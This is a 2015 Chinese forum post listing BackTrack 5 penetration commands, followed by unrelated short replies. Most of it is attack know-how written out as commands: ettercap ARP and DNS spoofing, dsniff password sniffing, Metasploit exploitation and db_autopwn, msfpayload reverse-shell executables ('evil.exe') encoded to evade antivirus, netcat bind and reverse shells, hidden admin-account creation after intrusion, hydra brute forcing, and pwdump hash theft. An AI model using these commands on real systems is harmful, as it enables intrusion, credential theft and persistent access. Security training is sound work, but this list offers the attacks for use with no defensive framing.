关灯
开启左侧

[网络安全] BT5渗透常用命令整理| →『网络安全区』

[复制链接]
kjeittccdf 发表于 2015-3-28 01:43:00 | 显示全部楼层 |阅读模式 打印 上一主题 下一主题
 
whois 域名/ip 查看域名的详细信息。

ping 域名/ip 测试本机到远端主机是否联通。

dig 域名/ip 查看域名解析的详细信息。

host -l 域名 dns服务器 传输zone。

扫描

nmap:

-sS 半开扫描TCP和SYN扫描。

-sT 完全TCP连接扫描。

-sU UDP扫描

-PS syn包探测(防火墙探测)

-PA ack包探测(防火墙探测)

-PN 不ping。

-n 不dns解析。

-A -O和-sV。

-O 操作系统识别。

-sV 服务版本信息(banner)

-p 端口扫描。

-T 设置时间级别(0-5)

-iL 导入扫描结果。

-oG 输出扫描结果。



操作系统识别:

p0f -i eth0 -U -p 开启混杂模式。

xprobe2 ip|域名 检测os。

banner获取:

nc ip port  检测端口是否打开。

telnet ip port  检测端口是否打开。

wget ip  下载主页。

cat index.html | more  显示主页代码。

q   退出。

windows枚举

nmap -sS -p 139,445 ip  扫描windows。

cd /pentest/enumeration/smb-enum

nbtscan -f targetIP  检测netbios。

smbgetserverinfo -i targetIP  扫描name,os,组。

smbdumpusers -i targetIP  列出用户。

smbclient -L //targetIP  列出共享。

使用windows:

net use \\ip\ipc$ "" /u:""  开启空会话。

net view \\ip               显示共享信息。

smbclient:

smbclient -L hostName -I targetIP 枚举共享。

smbclient -L hostName/share -U "" 用空用户连接。

smbclient -L hostName -I targetIP -U admin普通用户连接。

rpcclient:

rpcclient targetIP -U “”打开一个空会话。

netshareenum  枚举共享。

enumdomusers  枚举用户。

lsaenumsid    枚举域SID。

queryuser RID 查询用户信息。

createdomuser 创建用户访问。

ARP欺骗:

ettercap:

nano /usr/local/etc/etter.conf配置文件

Sniff > Unified sniffing > Network interface: eth0 > OK  设置抓包的网卡

Hosts > Scan for hosts (do this two times)扫描网段的主机

Hosts > Hosts list 显示主机列表

Select the default gateway > Add to Target 1 添加主机

Select the target > Add to Target 2 添加主机

Mitm > Arp poisoning > Sniff remote connections > OK  设置ARP攻击

Start > Start sniffing 开始攻击

dsniff -i eth0 监听网卡窃听登录用户密码

urlsnarf -i eth0 嗅探http请求

msgsnarf -i eth0 嗅探聊天软件的聊天内容

driftnet -i eth0 网络管理嗅探图片,音频。

nano /usr/local/share/ettercap/etter.dns编辑配置文件

Plugins > Manage the plugins > dns_spoof 设置dns欺骗

Mitm > Arp poisoning > Sniff remote connections > OK 设置ARP

Start > Start sniffing 开始攻击



Exploits漏洞利用:

cd /pentest/exploits/exploit-db 进入目录

cat sploitlist.txt | grep -i [exploit] 查询需要的漏洞

cat exploit | grep "#include"检查运行环境

cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u只保留可以在linux下运行的代码



Metasploit:

svn update 升级

./msfweb Web接口127.0.0.1:55555。.

./msfconsole 字符下的Console。

help 帮助

show <option> 显示选项

search <name> 搜索名字

use <exploit name> 使用漏洞

show options  显示选项

set <OPTION NAME> <option> 设置选项

show payloads 显示装置

set PAYLOAD <payload name> 设置装置

show options  显示选项

set <OPTION NAME> <option> 设置选项

show targets  显示目标(os版本)

set TARGET <target number> 设置目标版本

exploit 开始漏洞攻击

sessions -l 列出会话

sessions -i <ID> 选择会话

sessions -k <ID> 结束会话

<ctrl> z  把会话放到后台

<ctrl> c  结束会话

jobs   列出漏洞运行工作

jobs -K  结束一个漏洞运行工作

show auxiliary 显示辅助模块

use <auxiliary name> 使用辅助模块

set <OPTION NAME> <option> 设置选项

run  运行模块

scanner/smb/version 扫描系统版本

scanner/mssql/mssql_ping 测试mssql是否在线

scanner/mssql/mssql_login 测试登录(暴力或字典)

Attacker behind firewall:  bind shell正向

Target behind firewall:  reverse shell反向

Meterpreter衔接不懂dos的可以用这个:

db_import_nessus_nbe 加载nessus的扫描结果

db_import_nmap_xml 加载nmap的扫描结果

自动化攻击流程:

cd /pentest/exploit/framework3

./msfconsole

load db_sqlite3

db_destroy pentest

db_create pentest

db_nmap targetIP

db_hosts

db_services

db_autopwn -t -p -e

字符接口攻击流程:

./msfcli | grep -i <name>

./msfcli <exploit or auxiliary> S

./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E

做木马后门等:

./msfpayload <payload> <variable=value> <output type>

S        summary and options of payload

C        C language

P        Perl

y         Ruby

R        Raw, allows payload to be piped into msfencode and other tools

J         JavaScript

X        Windows executable

./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C

./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exe

编码处理就是做免杀:

./msfencode <options> <variable=value>

./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b &#39;\x00&#39; -l

./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b &#39;\x00&#39; -e PexFnstenvMor -t c



入侵后在windows下添加管理员用户:

hostname 查看主机名

net users 查看用户

net user 用户 密码 /add 添加用户

net localgroup 查看工作组

net localgroup administrators 查看管理员组

net localgroup administrators x /add 将用户加入管理员组



TFTP

cp /pentest/windows-binaries/tools/nc.exe /tmp/传递到tftp上

tftp -i 10.1.1.2 GET nc.exe下载

netcat瑞士军刀

attacker:  10.1.1.1

target:  10.1.1.2

nc -v -z 10.1.1.2 1-1024 端口扫描

target:  nc -lvp 4444 聊天设置(服务)

attacker:  nc -v 10.1.1.2 4444 聊天设置(客户)

target:  nc -lvp 4444 > output.txt传输文件(接受)

attacker:  nc -v 10.1.1.2 4444 < test.txt传输文件(发送)

target:  nc -lvp 4444 -e cmd.exe  Bind shell。

attacker:  nc -v 10.1.1.2 4444

target:nc -lvp 4444  Reverse shell。

attacker:nc -v 10.1.1.2 4444 -e /bin/bash



密码

字典zcat /pentest/password/dictionaries/wordlist.txt.Z > words

cat words | wc -l显示个数(30多万个)     

暴力:

hydra -l ftp -P words -v targetIP ftp 攻击ftp。

hydra -l muts -P words -v targetIP pop3 攻击pop3

hydra -P words -v targetIP snmp 攻击snmp

攻击microsof VPN

nmap -p 1723 targetIP

dos2unix words

cat words | thc-pptp-bruter targetIP

WYD:

wget -r www.target.com --accept=pdf 下载pdf文档

wyd.pl -o output.txt www.target.com/

cat output.txt | more

SAM文件(windows下的密码文件):

%SYSTEMROOT%/system32/config

%SYSTEMROOT%/repair

备份windows的hash文件:

./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E

meterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\

meterpreter > execute -f cmd -c

meterpreter > interact x

C:\WINDOWS\system32> pwdump \\127.0.0.1

john破解密码:

cp hash.txt /pentest/password/john-1.7.2/run/

cd /pentest/password/john-1.7.2/run/

./john hash.txt

彩虹表:

rcrack *.rt -f hash.txt



本地修改密码:

mount

umount /mnt/hda1

modprobe fuse

ntfsmount /dev/hda1 /mnt/hda1

mount
 

精彩评论10

正序浏览
亮凌庚 发表于 2015-6-23 22:00:05 | 显示全部楼层
 
哈 你逗逗他啊
 
kwjvtwzx 发表于 2015-6-23 22:00:51 | 显示全部楼层
 
baidu是相当能折腾我了
 
efiew 发表于 2015-6-23 22:07:09 | 显示全部楼层
 
挨骂也是幸福~~~
 
swmozowtfl 发表于 2015-6-23 22:08:57 | 显示全部楼层
 
我怎么就踩不死你呢??
 
xiaoye 发表于 2015-6-23 22:24:12 | 显示全部楼层
 
本人过去、现在以及将来都不认识楼主,且自古以来与楼主无利益关系。楼主表述之事与本人无关
 
gevaemaidovef 发表于 2015-7-25 18:00:25 | 显示全部楼层
 
哦...这个...偶昨天就看了....
 
bqtklouu 发表于 2015-7-25 18:15:57 | 显示全部楼层
 
楼猪.重量级人物阿.
 
wwdu926a 发表于 2015-7-25 18:16:58 | 显示全部楼层
 
嘻嘻~` 要是只看你的话~`~`` 很容易让人家以为你也跟偶们一样是天使类~`(偷笑中````````
 
buingeEvineus 发表于 2015-7-25 18:20:08 | 显示全部楼层
 
好吧...那你说...
 
kpasd 发表于 2015-8-28 22:40:30 | 显示全部楼层
 
谢谢了。。。 我很赞成,继续努力吧












                               
登录/注册后可看大图


                               
登录/注册后可看大图
 
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则


0关注

1粉丝

392帖子

热门图文
热门帖子
排行榜
作者专栏

关注我们:微信订阅号

官方微信

APP下载

全国服务Q Q:

956130084

中国·湖北

Email:956130084@qq.com

Copyright   ©2015-2022  站长技术交流论坛|互联网技术交流平台Powered by©Discuz!技术支持:得知网络  

鄂公网安备 42018502006730号

  ( 鄂ICP备15006301号-5 )